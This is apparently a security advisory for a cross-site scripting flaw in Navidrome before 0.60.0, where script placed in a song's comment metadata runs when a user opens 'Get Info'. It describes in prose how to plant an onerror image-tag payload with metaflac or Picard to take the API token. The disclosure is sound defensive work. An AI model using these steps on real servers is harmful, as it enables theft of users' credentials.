Navidrome Cross-Site Scripting Vulnerability Allowing Credential Exfiltration

A cross-site scripting (XSS) vulnerability has been identified in Navidrome versions prior to 0.60.0. This issue allows attackers to inject malicious code through the comment metadata of songs, which can then be used to exfiltrate user credentials. The vulnerability arises because the application’s frontend, built with React, improperly sanitizes user-supplied data before rendering it. Exploitation requires the attacker to craft a song comment that includes the malicious payload, which is then executed when the comment is viewed by a user.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where injected scripts are executed in the context of the user’s session, potentially leading to the theft of sensitive information such as the Navidrome API token.

Reproduction

To reproduce this vulnerability, first modify the comment field of a song to include a payload that exploits the XSS flaw, such as an image tag with an 'onerror' event. This can be done using tools like MusicBrainz Picard or by using 'metaflac' to inject the payload into a FLAC file's comment metadata. Once the song is crafted, add it to Navidrome. Then, navigate to the 'Songs' or the relevant album page, access the 'Get Info' option from the menu, and the injected payload will execute, demonstrating the XSS vulnerability.

Remediation

Users should update to Navidrome version 0.60.0 or later, where this vulnerability has been patched.